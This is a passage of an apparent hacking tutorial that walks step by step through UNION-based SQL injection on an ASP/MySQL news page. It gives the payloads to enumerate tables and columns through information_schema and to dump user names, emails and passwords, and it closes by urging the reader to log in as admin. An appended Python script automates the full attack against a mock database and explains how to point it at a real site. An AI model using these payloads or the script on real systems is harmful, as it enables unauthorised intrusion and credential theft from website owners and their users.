step 2: add after the 2, with a space, and 1=0 and then and 1=1
so: http://www.site.com/news.asp?id=2 and 1=0
With 1=0 you should get an error or an empty page, like:
ADODB.Field error '80020009'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/default.asp, line 0
With 1=1 you should get the normal page. (The WHERE clause now always evaluates to false or to true; a page that changes between the two is putting your input straight into the SQL query.)
step 3: add after the 2, this time without a space (and remove the step 2 text):
+union+select+0+from+cruz3n
(cruz3n is just a table name that does not exist; any made-up name works.) You should get an error like:
Microsoft OLE DB Provider for ODBC Drivers error '80040e37'
[MySQL][ODBC 3.51 Driver][mysqld-5.0.24-community-nt]Table 'ssk2006.cruz3n' doesn't exist
/inc/extra.asp, line 110
step 4: MySQL prefixes the missing table with the current database name, so the database is: ssk2006
step 5: (again, remove everything after the 2)
+union+select+0+from+information_schema.tables
MySQL requires both sides of a UNION to return the same number of columns, so keep adding one number at a time:
+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12+from+information_schema.tables
As long as the count is wrong you get this error:
The used SELECT statements have a different number of columns
Stop as soon as that error goes away; what you get instead is either the normal page or an ASP error such as:
Type mismatch
That error comes from the ASP page, not from MySQL: the column count is now right (13 columns, 0 to 12, in this example) and the row your UNION supplies is being rendered.
step 6: Now we are almost done!!
step 7: change http://Site.com/news.asp?id=2 to http://..../news.asp?id=-2
(i changed 2 to -2; saying this because some don't see it.) No news item has id -2, so the original query returns nothing and the row your UNION SELECT supplies is the one the page displays.
The frame/title of the page now changes to one of your numbers (7 here, for example): that number tells you which of the columns is printed on the page.
step 8: replace that number with table_name (without quotes), so 7 becomes table_name, and the title shows the first table MySQL knows about: CHARACTER_SETS (a table of information_schema, not of the site).
step 9: now add a where clause on the database you found in step 4 (7 is still replaced by table_name):
+union+select+0,1,2,3,4,5,6,table_name,8,9,10,11,12+from+information_schema.tables+where+table_schema='ssk2006'
The frame/title changes to a table name from that database, like tblUsers.
Put +limit+1,1 after the 'databasename' to walk through the tables one by one:
+union+select+0,1,2,3,4,5,6,table_name,8,9,10,11,12+from+information_schema.tables+where+table_schema='ssk2006'+limit+1,1
(ssk2006 is the database again; limit 1,1 means skip one row and return one row)
Go ahead by counting up:
+union+select+0,1,2,3,4,5,6,table_name,8,9,10,11,12+from+information_schema.tables+where+table_schema='ssk2006'+limit+2,1
(or 3,1, 4,1, etc.)
until you get something like tblUser or another name with User in it. (The page may still say Type mismatch; the title still changes.)
step 10: tblUser is the table of the users!! yeah, found
step 11: change
+union+select+0,1,2,3,4,5,6,table_name,8,9,10,11,12+from+information_schema.tables+where+table_schema='ssk2006'+limit+1,1
to:
+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_name='tblUser'
Then you get a number again (7 for example, still with Type mismatch!)
step 12: change the number to column_name, so you get this:
+union+select+0,1,2,3,4,5,6,column_name,8,9,10,11,12+from+information_schema.columns+where+table_name='tblUser'
Then you see something like iUserID (or e.g. login): the first column of tblUser.
step 13: change
+union+select+0,1,2,3,4,5,6,column_name,8,9,10,11,12+from+information_schema.columns+where+table_name='tblUser'
to:
+union+select+0,1,2,3,4,5,6,column_name,8,9,10,11,12+from+information_schema.columns+where+table_name='tblUser'+limit+1,1
Write down everything you get, like:
iUserActive, sUserName, sPassword, etc.
With the limit 1,1 method keep counting up: 2,1 - 3,1 - 4,1, etc., until the page comes back empty; then you have every column of the table.
step 14: change
+union+select+0,1,2,3,4,5,6,column_name,8,9,10,11,12+from+information_schema.columns+where+table_name='tblUser'+limit+4,1
to
+union+select+0,1,2,3,4,5,6,sUserName,8,9,10,11,12+from+tblUser
i.e. now select from tblUser itself, with one of the columns you wrote down in step 13 in the visible slot. Use +limit+1,1, +limit+2,1 and so on here too if there is more than one user.
step 15: Now you have finished SQL injection. Repeat step 14 for each column:
sUserName (ex: Cruz3N)
sUserEmail (ex: cruzenaldo@gmail.com)
sUserLogin (ex: Cruz3N)
sUserPassword (ex: Ganteng)
Now go to the admin login page, and have fun
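The whole procedure from step 2 to step 14, as an added example that is not part of the original post: a Python script that runs the boolean probe, finds the column count, finds the visible column with id=-2, leaks the database name with a bogus table, and then walks information_schema.tables, information_schema.columns and the user table with LIMIT k,1. It is run against a constructed stand-in for news.asp: an in-memory SQLite database with a fake information_schema attached, so the same information_schema queries and LIMIT offsets execute unchanged, and the mock imitates the MySQL and ADODB error texts quoted above. The column count (13, column 7 visible), the names cruz3n, ssk2006 and tblUser are taken from the post; the sample user row and the table layout are made up for the mock. Two differences from the post: the schema-leak probe is sent with the correct column count (after step 5) so the missing-table error is the only one that can fire, and the ASP "Type mismatch" is not simulated, the mock simply prints the injected value in the title.

```python
import re
import sqlite3

NCOLS = 13  # assumption: the news query selected 13 columns (0..12), with column 7 shown on the page


def build_target():
    """Constructed stand-in for the vulnerable site: in-memory SQLite with a fake
    information_schema attached so MySQL-style metadata queries run offline."""
    db = sqlite3.connect(":memory:")
    db.execute("ATTACH DATABASE ':memory:' AS information_schema")
    db.execute("CREATE TABLE information_schema.tables(table_schema, table_name)")
    db.execute("CREATE TABLE information_schema.columns(table_schema, table_name, column_name)")
    db.execute("CREATE TABLE news(%s)" % ",".join("c%d" % i for i in range(NCOLS)))
    db.execute("INSERT INTO news VALUES (2,1,2,3,4,5,6,'Latest news',8,9,10,11,12)")
    db.execute("CREATE TABLE tblUser(iUserID, sUserName, sUserEmail, sUserLogin, sUserPassword)")
    db.execute("INSERT INTO tblUser VALUES (1,'admin','admin@example.invalid','admin','P@ssw0rd')")
    db.executemany("INSERT INTO information_schema.tables VALUES (?,?)",
                   [("information_schema", "CHARACTER_SETS"), ("ssk2006", "news"), ("ssk2006", "tblUser")])
    db.executemany("INSERT INTO information_schema.columns VALUES (?,?,?)",
                   [("ssk2006", "tblUser", c) for c in
                    ("iUserID", "sUserName", "sUserEmail", "sUserLogin", "sUserPassword")])
    return db


def make_page(db):
    """news.asp look-alike: concatenates ?id= straight into the SQL (the bug) and
    prints column 7 of the first row in the title; error texts imitate the post."""
    def news_page(id_param):
        sql = "SELECT * FROM news WHERE c0=" + id_param  # unsanitised: the injection point
        try:
            row = db.execute(sql).fetchone()
        except sqlite3.OperationalError as exc:
            msg = str(exc)
            if "same number of result columns" in msg:
                return "error '80040e14' The used SELECT statements have a different number of columns"
            m = re.match(r"no such table: (\S+)", msg)
            if m:  # MySQL reports the missing table as database.table, which is what leaks the name
                return "error '80040e37' Table 'ssk2006.%s' doesn't exist" % m.group(1)
            return "error " + msg
        if row is None:
            return "ADODB.Field error '80020009' Either BOF or EOF is True"
        return "<title>%s</title>" % row[7]
    return news_page


def mark(n, pos, expr):
    """The post's 0,1,...,expr,...,n-1 UNION row: a number in every slot except pos."""
    return ",".join(expr if i == pos else str(i) for i in range(n))


def is_injectable(page):                       # step 2: the boolean probe
    return "ADODB" in page("2 and 1=0") and "ADODB" not in page("2 and 1=1")


def count_columns(page, limit=40):             # step 5: grow the UNION until the count error stops
    for n in range(1, limit + 1):
        if "different number of columns" not in page("-2 union select " + mark(n, -1, "")):
            return n
    return None


def visible_column(page, n):                   # step 7: id=-2 so only the UNION row is rendered
    m = re.search(r"<title>(\d+)</title>", page("-2 union select " + mark(n, -1, "")))
    return int(m.group(1)) if m else None


def leak_schema(page, n):                      # steps 3-4: a bogus table name leaks 'db.table'
    m = re.search(r"Table '([^'.]+)\.", page("-2 union select %s from cruz3n" % mark(n, -1, "")))
    return m.group(1) if m else None


def extract_all(page, n, pos, expr, source, where="", max_rows=200):
    """Steps 9-14: read expr one row per request with LIMIT k,1 until the page is empty."""
    values = []
    for k in range(max_rows):
        union = "-2 union select %s from %s %s limit %d,1" % (mark(n, pos, expr), source, where, k)
        m = re.search(r"<title>(.*?)</title>", page(union))
        if not m:
            break
        values.append(m.group(1))
    return values


def run_attack(page):
    if not is_injectable(page):
        return None
    n = count_columns(page)
    pos = visible_column(page, n)
    schema = leak_schema(page, n)
    tables = extract_all(page, n, pos, "table_name", "information_schema.tables",
                         "where table_schema='%s'" % schema)
    user_table = next((t for t in tables if "user" in t.lower()), None)
    columns = extract_all(page, n, pos, "column_name", "information_schema.columns",
                          "where table_name='%s'" % user_table)
    return {"schema": schema, "columns": n, "visible": pos, "tables": tables,
            "user_table": user_table, "user_columns": columns,
            "rows": {c: extract_all(page, n, pos, c, user_table) for c in columns}}


if __name__ == "__main__":
    print(run_attack(make_page(build_target())))
```

Running it prints the database name, the column count and visible slot, the table and column lists, and every value of every column of the user table, which is what steps 13 to 15 collect by hand. Against a real site replace news_page with a function that fetches the URL and returns the body; the classification only depends on the strings shown in the post.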